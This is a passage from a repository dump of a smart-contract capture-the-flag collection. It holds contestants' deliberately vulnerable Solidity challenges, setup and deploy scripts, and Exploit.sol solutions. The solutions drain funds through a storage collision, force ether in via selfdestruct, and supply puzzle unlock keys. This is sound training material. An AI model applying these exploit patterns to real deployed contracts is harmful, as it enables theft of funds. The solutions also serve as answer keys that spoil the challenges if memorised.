├── 0xNazgul ├── README.md ├── contracts │ ├── Exploit.sol │ ├── FloraToken.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── 0xmoostorm ├── .gitignore ├── README.md ├── contracts │ ├── CollisionExchange.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── Baraa42 ├── .env.example ├── .gitattributes ├── .gitignore ├── README.md ├── brownie-config.yaml ├── contracts │ ├── Casino.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── interfaces │ └── ICasino.sol └── scripts │ ├── __init__.py │ └── helpful_scripts.py ├── BowTiedPickle ├── Exploit.sol ├── ISetup.sol ├── Padlock.sol ├── README.md └── Setup.sol ├── EXTRA.md ├── GUIDE.md ├── JustDravee ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── SheerLocking.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── KahanMajmudar ├── .gitignore ├── .prettierrc ├── README.md ├── contracts │ ├── CustomMarketplace.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json └── scripts │ ├── deploy.js │ └── solving.js ├── PeterisPrieditis ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ ├── StableSwap2.sol │ └── test │ │ └── TestERC20.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── test │ └── deployment.js ├── README.md ├── RomiRand ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── Unbreakable.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── Thro77le ├── .gitignore ├── README.md ├── contracts │ ├── Challenge.sol │ ├── Dummy.sol │ ├── Exploit.sol │ ├── Factory.sol │ └── Setup.sol ├── hardhat.config.ts ├── package.json ├── scripts │ ├── deploy.ts │ └── solve.ts ├── test │ └── sherlock.test.ts ├── tsconfig.json └── yarn.lock ├── WRITEUPS.md ├── agusduha ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── TheKingIsDeadLongLiveTheKing.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── bahurum ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Inflation.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── band0x ├── BecomeMaster.js ├── BecomeMaster.sol ├── Exploit.sol ├── ISetup.sol ├── README.md └── Setup.sol ├── chaboo ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── SwissTreasury.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ ├── arguments.js │ │ ├── deploy.js │ │ └── verify.js │ ├── hardhat │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── ebaizel ├── .gitignore ├── README.md └── contracts │ ├── Exploit.sol │ ├── PixelPavel.sol │ └── Setup.sol ├── hack3r-0m ├── .gitignore ├── README.md ├── contracts │ ├── BitMania.sol │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── solution.py ├── hardhat.config.js ├── package.json ├── scripts │ └── goerli │ │ └── deploy.js └── yarn.lock ├── iflp ├── .gitignore ├── README.md ├── contracts │ ├── ExampleQuizExploit.sol │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Lollercoaster.sol │ └── Setup.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── johngish ├── README.md └── contracts │ ├── Challenge.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── kankan-0 ├── README.md ├── contracts │ ├── Dead.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol └── scripts │ └── goerli │ └── deploy.js ├── kuldeep23907 ├── .gitignore ├── README.md ├── contracts │ ├── Challenge.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── lucyoa ├── .gitignore ├── README.md ├── contracts │ ├── Challenge.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json └── scripts │ ├── goerli │ └── deploy.js │ └── solving.js ├── luksgrin ├── README.md ├── contracts │ ├── HauntedDungeon.sol │ ├── HauntedDungeonExploit.sol │ ├── ISetup.sol │ └── Setup.sol └── instructions │ ├── README.md │ └── reference │ ├── README.md │ ├── contracts │ ├── ExampleQuizExploit.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol │ ├── hardhat.config.js │ ├── package.json │ ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js │ └── yarn.lock ├── mhchia ├── .gitignore ├── README.md ├── contracts │ ├── CrowdFunding.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── naps62 ├── .eslintignore ├── .eslintrc.js ├── .gitignore ├── .prettierrc ├── .projections.json ├── .solhint.json ├── .solhintignore ├── LICENSE ├── README.md ├── contracts │ ├── BuiltByANoob.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── deploy │ └── deploy.ts ├── deployments │ └── goerli │ │ ├── .chainId │ │ ├── Setup.json │ │ └── solcInputs │ │ └── 41ffeb281b20b007621397302f2675e8.json ├── hardhat.config.ts ├── package.json ├── test │ └── example.ts ├── tsconfig.json └── yarn.lock ├── plotchy ├── .gitattributes ├── .gitignore ├── HouseOfMirrorsCallMap.ods ├── README.md ├── brownie-config.yaml ├── contracts │ ├── AmusementPark.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── scripts │ ├── __init__.py │ ├── helpful_scripts.py │ └── solve.py └── tests │ ├── __init__.py │ └── test_unit.py ├── saianmk ├── .gitignore ├── README.md ├── contracts │ ├── Combination.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── test │ └── combination.js ├── score.json ├── sidduHERE ├── .gitignore ├── README.md ├── contracts │ ├── ExampleQuizExploit.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── smbsp ├── .gitignore ├── README.md ├── contracts │ ├── CollectReward.sol │ ├── Exploit.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── solves.json ├── t-nero ├── README.md ├── contracts │ ├── Exploit.sol │ ├── Exploit2.sol │ ├── ISetup.sol │ ├── Monopoly.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ └── deploy.js └── test │ ├── test.js │ └── test2.js ├── teryanarmen ├── .eslintignore ├── .eslintrc.js ├── .gitignore ├── .npmignore ├── .prettierignore ├── README.md ├── contracts │ ├── Challenge2.sol │ ├── Exploit.sol │ └── Setup.sol ├── hardhat.config.ts ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.ts │ └── solve.ts ├── src │ └── types │ │ ├── Challenge.ts │ │ ├── Challenge2.ts │ │ ├── Exploit1.ts │ │ ├── Exploit2.ts │ │ ├── Exploit3.ts │ │ ├── Exploit4.ts │ │ ├── ExploitHelper.ts │ │ ├── ExploitMain.ts │ │ ├── ICalled.ts │ │ ├── ISetup.ts │ │ ├── Setup.ts │ │ ├── common.ts │ │ ├── factories │ │ ├── Challenge2__factory.ts │ │ ├── Challenge__factory.ts │ │ ├── Exploit1__factory.ts │ │ ├── Exploit2__factory.ts │ │ ├── Exploit3__factory.ts │ │ ├── Exploit4__factory.ts │ │ ├── ExploitHelper__factory.ts │ │ ├── ExploitMain__factory.ts │ │ ├── ICalled__factory.ts │ │ ├── ISetup__factory.ts │ │ └── Setup__factory.ts │ │ ├── hardhat.d.ts │ │ └── index.ts └── tsconfig.json ├── tqtsar ├── .gitignore ├── README.md ├── contracts │ ├── Exploit.sol │ ├── Fundraising.sol │ ├── ISetup.sol │ └── Setup.sol ├── hardhat.config.js ├── package-lock.json ├── package.json ├── scripts │ ├── goerli │ │ └── deploy.js │ └── solving.js └── yarn.lock ├── wuwe1 ├── .gitattributes ├── .gitignore ├── README.md ├── brownie-config.yaml ├── contracts │ ├── Exploit.sol │ ├── ISetup.sol │ ├── Setup.sol │ └── Superfluid.sol └── tests │ └── test_exploit.py └── ych18 ├── Exploit.sol ├── FunnyChallenges.sol ├── ISetup.sol ├── README.md └── Setup.sol /0xNazgul/README.md: -------------------------------------------------------------------------------- 1 | # Draft CTF submission 2 | 3 | 4 | | Contract | Goerli | 5 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 6 | | FloraToken.sol | [0x75b665c3695293659949c18719d046089F423834](https://goerli.etherscan.io/address/0x75b665c3695293659949c18719d046089f423834) | 7 | | Setup.sol | [0xd80960575d177A09FEb8497dBaE9F6583fcFe297](https://goerli.etherscan.io/address/0xd80960575d177a09feb8497dbae9f6583fcfe297) | 8 | 9 | `.env` file 10 | 11 | ``` 12 | ETHERSCAN_API= 13 | ALCHEMY_API_KEY_GOERLI= 14 | PRIVATE_KEY= 15 | ``` 16 | -------------------------------------------------------------------------------- /0xNazgul/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.4; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /0xNazgul/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /0xNazgul/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "@openzeppelin/contracts": "^4.5.0", 14 | "dotenv": "^14.3.2" 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /0xNazgul/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 6 | } 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | 11 | const setup = await SETUP.deploy({ value: parseEther("1") }); 12 | await setup.deployed(); 13 | 14 | const ctf = await ethers.getContractAt( 15 | "ExampleQuizExploit", 16 | await setup.instance() 17 | ); 18 | 19 | console.log("Deployed setup to", setup.address); 20 | console.log("Deployed ctf to", ctf.address); 21 | 22 | // wait for etherscan to index 23 | await sleep(300); 24 | 25 | // verify 26 | await hre.run("verify:verify", { 27 | address: setup.address, 28 | }); 29 | await hre.run("verify:verify", { 30 | address: ctf.address, 31 | }); 32 | } 33 | 34 | main() 35 | .then(() => process.exit(0)) 36 | .catch((error) => { 37 | console.error(error); 38 | process.exit(1); 39 | }); 40 | -------------------------------------------------------------------------------- /0xNazgul/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy({ value: parseEther("1") }); 8 | const ctf = await ethers.getContractAt( 9 | "ExampleQuizExploit", 10 | await setup.instance() 11 | ); 12 | 13 | console.log("solved:", await setup.isSolved()); 14 | 15 | await EXPLOIT.deploy(ctf.address, { value: parseEther("1") }); 16 | 17 | console.log("solved:", await setup.isSolved()); 18 | } 19 | 20 | main() 21 | .then(() => process.exit(0)) 22 | .catch((error) => { 23 | console.error(error); 24 | process.exit(1); 25 | }); 26 | -------------------------------------------------------------------------------- /0xmoostorm/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /0xmoostorm/README.md: -------------------------------------------------------------------------------- 1 | # Collision Exchange CTF submission 2 | 3 | > Don't deploy the solution (`Exploit.sol`) to a public chain! 4 | 5 | | Contract | Goerli | 6 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 7 | | CollisionExchange.sol | [0xE442a00a4587677c945598e19DF41822e851c1DE](https://goerli.etherscan.io/address/0xE442a00a4587677c945598e19DF41822e851c1DE) | 8 | | Setup.sol | [0x5e40D0d98126323b81246008d386a93BA091704f](https://goerli.etherscan.io/address/0x5e40D0d98126323b81246008d386a93BA091704f) | 9 | 10 | `.env` file 11 | 12 | ``` 13 | ETHERSCAN_API= 14 | ALCHEMY_API_KEY_GOERLI= 15 | PRIVATE_KEY= 16 | ``` 17 | -------------------------------------------------------------------------------- /0xmoostorm/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.8.4; 2 | 3 | import './CollisionExchange.sol'; 4 | 5 | contract Exploit { 6 | 7 | address public orderBook; 8 | address public owner; 9 | 10 | CollisionExchange public exchange; 11 | 12 | 13 | constructor(CollisionExchange _exchange) payable { 14 | exchange = CollisionExchange(_exchange); 15 | } 16 | 17 | function postTrade(uint _amount) external { 18 | owner = msg.sender; 19 | } 20 | 21 | function finalize() external payable { 22 | exchange.postTrade(uint(uint160(address(this)))); 23 | exchange.postTrade(1); 24 | exchange.emergencyWithdraw(); 25 | } 26 | 27 | receive() external payable {} 28 | 29 | } -------------------------------------------------------------------------------- /0xmoostorm/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /0xmoostorm/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './CollisionExchange.sol'; 5 | 6 | contract Setup is ISetup { 7 | CollisionExchange public exchange; 8 | OrderBook public orderBook; 9 | 10 | constructor() payable { 11 | require(msg.value == 1 ether); 12 | 13 | orderBook = new OrderBook(); 14 | emit Deployed(address(orderBook)); 15 | 16 | orderBook.postTrade(address(this), msg.value); 17 | 18 | exchange = new CollisionExchange(address(orderBook)); 19 | emit Deployed(address(exchange)); 20 | 21 | exchange.deposit{value: msg.value}(); 22 | } 23 | 24 | function isSolved() external override view returns (bool) { 25 | return address(exchange).balance == 0; 26 | } 27 | } -------------------------------------------------------------------------------- /0xmoostorm/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /0xmoostorm/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "dotenv": "^14.3.2" 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /0xmoostorm/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const { ethers } = require("hardhat"); 3 | const hre = require("hardhat"); 4 | 5 | function sleep(seconds) { 6 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 7 | } 8 | 9 | async function main() { 10 | const SETUP = await ethers.getContractFactory("Setup"); 11 | 12 | console.log('BEGINNING SETUP DEPLOYMENT'); 13 | 14 | const setup = await SETUP.deploy({ value: parseEther("1") }); 15 | await setup.deployed(); 16 | 17 | const ctf = await ethers.getContractAt("CollisionExchange", await setup.exchange()); 18 | const orderBook = await ethers.getContractAt("OrderBook", await setup.orderBook()); 19 | 20 | console.log("Deployed setup to", setup.address); 21 | console.log("Deployed ctf to", ctf.address); 22 | console.log("Deployed orderBook to", orderBook.address); 23 | 24 | // wait for etherscan to index 25 | await sleep(300); 26 | 27 | verify 28 | await hre.run("verify:verify", { 29 | address: setup.address, 30 | }); 31 | await hre.run("verify:verify", { 32 | address: ctf.address, 33 | }); 34 | await hre.run("verify:verify", { 35 | address: orderBook.address, 36 | }); 37 | } 38 | 39 | main() 40 | .then(() => process.exit(0)) 41 | .catch((error) => { 42 | console.error(error); 43 | process.exit(1); 44 | }); 45 | -------------------------------------------------------------------------------- /0xmoostorm/scripts/solving.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | 3 | async function main() { 4 | const SETUP = await ethers.getContractFactory("Setup"); 5 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 6 | 7 | const setup = await SETUP.deploy({ value: parseEther("1") }); 8 | const ctf = await ethers.getContractAt( 9 | "ExampleQuizExploit", 10 | await setup.instance() 11 | ); 12 | 13 | console.log("solved:", await setup.isSolved()); 14 | 15 | await EXPLOIT.deploy(ctf.address, { value: parseEther("1") }); 16 | 17 | console.log("solved:", await setup.isSolved()); 18 | } 19 | 20 | main() 21 | .then(() => process.exit(0)) 22 | .catch((error) => { 23 | console.error(error); 24 | process.exit(1); 25 | }); 26 | -------------------------------------------------------------------------------- /Baraa42/.env.example: -------------------------------------------------------------------------------- 1 | export PRIVATE_KEY = 0xpR1v4T3K3y 2 | export WEB3_INFURA_PROJECT_ID = web31nFuR4pR073c71d 3 | export ETHERSCAN_TOKEN = 3T3R5c4nT0k3n 4 | -------------------------------------------------------------------------------- /Baraa42/.gitattributes: -------------------------------------------------------------------------------- 1 | *.sol linguist-language=Solidity 2 | *.vy linguist-language=Python 3 | -------------------------------------------------------------------------------- /Baraa42/.gitignore: -------------------------------------------------------------------------------- 1 | __pycache__ 2 | .env 3 | .history 4 | .hypothesis/ 5 | build/ 6 | reports/ 7 | -------------------------------------------------------------------------------- /Baraa42/README.md: -------------------------------------------------------------------------------- 1 | # CTF submission 2 | 3 | 4 | | Contract | Goerli | 5 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 6 | | Casino.sol | [0x31448618e0C48c6Bcb2A729709DDF51F1cA0c628](https://goerli.etherscan.io/address/0x31448618e0C48c6Bcb2A729709DDF51F1cA0c628) | 7 | | Setup.sol | [0xFfb20eF6668F8160934FD84b60F3DeD127F787Aa](https://goerli.etherscan.io/address/0xFfb20eF6668F8160934FD84b60F3DeD127F787Aa) | 8 | 9 | -------------------------------------------------------------------------------- /Baraa42/brownie-config.yaml: -------------------------------------------------------------------------------- 1 | dependencies: 2 | - OpenZeppelin/openzeppelin-contracts@3.4.0 3 | compiler: 4 | solc: 5 | remappings: 6 | - '@openzeppelin=OpenZeppelin/openzeppelin-contracts@3.4.0' 7 | dotenv: .env 8 | networks: 9 | default: development 10 | wallets: 11 | from_key: ${PRIVATE_KEY} -------------------------------------------------------------------------------- /Baraa42/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | 3 | pragma solidity 0.7.3; 4 | 5 | import "./Casino.sol"; 6 | 7 | contract Exploit { 8 | constructor(Casino instance) payable { 9 | require(msg.value > 0); 10 | selfdestruct(payable(address(instance))); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /Baraa42/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | 3 | pragma solidity 0.7.3; 4 | 5 | interface ISetup { 6 | event Deployed(address instance); 7 | 8 | function isSolved() external view returns (bool); 9 | } 10 | -------------------------------------------------------------------------------- /Baraa42/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | 3 | pragma solidity 0.7.3; 4 | 5 | import "./ISetup.sol"; 6 | import "./Casino.sol"; 7 | 8 | contract Setup is ISetup { 9 | Casino public casino; 10 | 11 | constructor() payable { 12 | casino = new Casino(); 13 | emit Deployed(address(casino)); 14 | } 15 | 16 | function isSolved() external view override returns (bool) { 17 | bool condition1 = address(casino).balance > 18 | casino.totalDeposits() + 19 | casino.totalPrize() + 20 | casino.totalJackpot(); 21 | bool condition2 = address(casino).balance > 22 | casino.totalDeposits() + 23 | (casino.totalPrize() * 25) / 24 | 100 + 25 | casino.totalJackpot(); 26 | bool gameOn = casino.gameOn(); 27 | 28 | return (gameOn && condition1) || (!gameOn && condition2); 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /Baraa42/interfaces/ICasino.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | pragma solidity 0.7.3; 3 | 4 | interface ICasino { 5 | function gameOn() external view returns (bool); 6 | 7 | function jackpot(uint256 num, uint256 chance) external payable; 8 | } 9 | -------------------------------------------------------------------------------- /Baraa42/scripts/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sherlock-protocol/sherlock-ctf-0x0/fd78069318b28c244429b1dc1f55245bdac66e7a/Baraa42/scripts/__init__.py -------------------------------------------------------------------------------- /Baraa42/scripts/helpful_scripts.py: -------------------------------------------------------------------------------- 1 | from brownie import accounts, network, config 2 | 3 | FORKED_LOCAL_ENVIRONMENTS = ["mainnet-fork", "mainnet-fork-dev"] 4 | LOCAL_BLOCKCHAIN_ENVIRONMENTS = ["development", "ganache-local", "mainnet-fork"] 5 | 6 | 7 | def get_account(index=None, id=None): 8 | # accounts[0] 9 | # accounts.add("env") 10 | # accounts.load("id") 11 | if index: 12 | return accounts[index] 13 | if id: 14 | return accounts.load(id) 15 | if ( 16 | network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS 17 | or network.show_active() in FORKED_LOCAL_ENVIRONMENTS 18 | ): 19 | return accounts[0] 20 | return accounts.add(config["wallets"]["from_key"]) 21 | -------------------------------------------------------------------------------- /BowTiedPickle/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './Padlock.sol'; 4 | 5 | contract Exploit { 6 | constructor(Padlock instance) payable { 7 | require(msg.value == 33); 8 | instance.pick1(unicode"‮6167209‬"); 9 | instance.pick2{value:33}(); 10 | instance.pick3(0x69420000000000000000000000000000); 11 | instance.open(); 12 | } 13 | } -------------------------------------------------------------------------------- /BowTiedPickle/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /BowTiedPickle/README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sherlock-protocol/sherlock-ctf-0x0/fd78069318b28c244429b1dc1f55245bdac66e7a/BowTiedPickle/README.md -------------------------------------------------------------------------------- /BowTiedPickle/Setup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './ISetup.sol'; 4 | import './Padlock.sol'; 5 | 6 | contract Setup is ISetup { 7 | Padlock public instance; 8 | 9 | constructor() payable { 10 | string memory PIN = unicode"‮6167209‬"; 11 | 12 | instance = new Padlock(PIN); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | bool unlocked = instance.opened(); 18 | return unlocked; 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /JustDravee/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .env 3 | coverage 4 | coverage.json 5 | typechain 6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /JustDravee/README.md: -------------------------------------------------------------------------------- 1 | # Sheerlocking 2 | Because... Why not just use sheer locking? =) 3 | 4 | ## Local Exploit Testing 5 | `npm run ctf-test` 6 | 7 | ## Goerli Deploy 8 | `npm run deploy` 9 | 10 | ## Deploy Info 11 | 12 | | Contract | Goerli | 13 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 14 | | SheerLocking.sol | [0xc7e13b9c94Eb3902Fa272E83Bb4D19392d09eF4d](https://goerli.etherscan.io/address/0xc7e13b9c94Eb3902Fa272E83Bb4D19392d09eF4d) | 15 | | Setup.sol | [0x1f5c09a7d6a9B30b43DDDAABD384425DEe0ADe91](https://goerli.etherscan.io/address/0x1f5c09a7d6a9B30b43DDDAABD384425DEe0ADe91) | 16 | -------------------------------------------------------------------------------- /JustDravee/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './SheerLocking.sol'; 4 | 5 | contract Exploit { 6 | constructor(SheerLocking instance) payable { 7 | // Only the 1st unSheerLock1 needs ether 8 | // For the solutions: just extract the full strings in each unSheerLock and look at which function parameters should be empty ("") or not. There are several solutions 9 | // There are several solutions for the last key, see Ethernaut's Gatekeeper 1 for more details (it's inspired from there) 10 | instance.unSheerLock1{value: 24725 wei}("Benedict"," Cumberbatch"," is"," the"," best", 0x1000000000002266); 11 | instance.unSheerLock2("",""," is nice too. I waited so long for season 4 :'( ","Jim Moriarty","", 0x1000000000002266); 12 | instance.unSheerLock3("The Woman"," is Missy/The Master",""," in Doctor"," Who", 0x1000000000002266); 13 | instance.unSheerLock4("","","John Watson had a role in Ali G (Ricky C) ","", "", 0x1000000000002266); 14 | instance.unSheerLock5("Henry Cavill:",""," Sherlock of Steel and Enola's"," big bro","", 0x1000000000002266); 15 | instance.unSheerLock6("Sir Arthur Conan Doyle"," died in 1930,",""," so copyright on Sherlock Holmes expired in 2000 in the UK", 0x1000000000002266); 16 | instance.unSheerLock7("Jonny Lee Miller"," and Lucy Liu",""," were a"," good team too!", 0x1000000000002266); 17 | // function attackChallenge() in Setup.sol is misleading on purpose 18 | // modifier onlyDeployer() isn't used on purpose to mislead 19 | // Several modifiers and 